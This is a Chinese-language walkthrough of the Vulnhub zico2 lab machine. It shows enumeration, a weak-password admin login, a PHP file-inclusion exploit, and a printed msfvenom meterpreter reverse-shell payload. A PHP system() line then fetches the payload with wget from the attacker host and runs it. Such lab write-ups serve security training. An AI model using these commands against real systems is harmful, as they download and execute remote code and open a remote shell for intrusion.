Vulnhub靶机 zico2
运行环境
本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运
行。
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机说明
本靶机的难度为中等。
本靶机的渗透目标为渗透进靶机,拿到root权限,并读取flag文件。
官方提供了一个提示:枚举、枚举、枚举。
不局限与桥接模式,也可以修改为net模式
确定ip后执行
Nmap -A 192.168.238.138 扫描详细信息
访问这个ip
使用御剑扫描毛都没有,果断放弃
改用dirb
发现登录页面
尝试使用弱密码admin进行登录
登录成功后发现有两条数据
点击浏览进行查看
发现加密代码
尝试解密得到:34kroot34 zico zico2215@
先把账户密码放一边
新建hack.php数据库
内容输入<?php phpinfo();?>用于测试,利用文件包含漏洞来访问创建的hack.php
因为 此版本存在远程代码执行漏洞
所以利用msf生成一个反向壳的shell通过文件包含漏洞执行
生成shell
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o shell.elf -a x64 --platform linux LHOST=192.168.238.128 LPORT=4444
并将生产是shell.elf cp到tmp下
监听开启
然后利用python -m SimpleHTTPServer 80 搭建一个简易的web服务器
Msf输入 use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.238.128
set LPORT 4444
Run
新建数据库
输入:<?php system("cd /tmp; wget http://192.168.238.128:80/shell.elf; chmod a+x shell.elf; ./shell.elf"); ?>
192.168.238.138/view.php?page=…/…/…/…/…/usr/databases/shell.php 访问
成功拿到shell
提权部分请参考十四关。